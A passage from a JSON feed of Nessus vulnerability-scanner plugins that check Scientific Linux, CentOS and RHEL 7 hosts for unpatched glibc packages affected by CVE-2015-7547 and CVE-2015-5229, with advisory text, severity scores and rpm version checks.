The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0.\n\n - On the little-endian variant of 64-bit IBM Power Systems\n (ppc64le), a bug in the dynamic loader could cause\n applications compiled with profiling enabled to fail to\n start with the error 'monstartup: out of memory'. The\n bug has been corrected and applications compiled for\n profiling now start correctly.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1602&L=scientific-linux-errata&F=&S=&P=15470\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3676f945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", 
cpu:\"x86_64\", reference:\"glibc-static-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:30:30", "description": "Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. 
This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. 
(BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 37, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "CentOS 7 : glibc (CESA-2016:0176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc"], "id": "CENTOS_RHSA-2016-0176.NASL", "href": "https://www.tenable.com/plugins/nessus/88758", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0176 and \n# CentOS Errata and Security Advisory 2016:0176 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88758);\n script_version(\"2.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0176\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"CentOS 7 : glibc (CESA-2016:0176)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed 
Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. 
The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. 
(BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-February/021672.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f51dca3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T05:35:29", "description": "Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. 
The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 37, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "RHEL 7 : glibc (RHSA-2016:0176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2016-0176.NASL", "href": "https://www.tenable.com/plugins/nessus/88785", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin 
were \n# extracted from Red Hat Security Advisory RHSA-2016:0176. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88785);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0176\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"RHEL 7 : glibc (RHSA-2016:0176)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. 
This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. 
(BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0176\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\n\n if 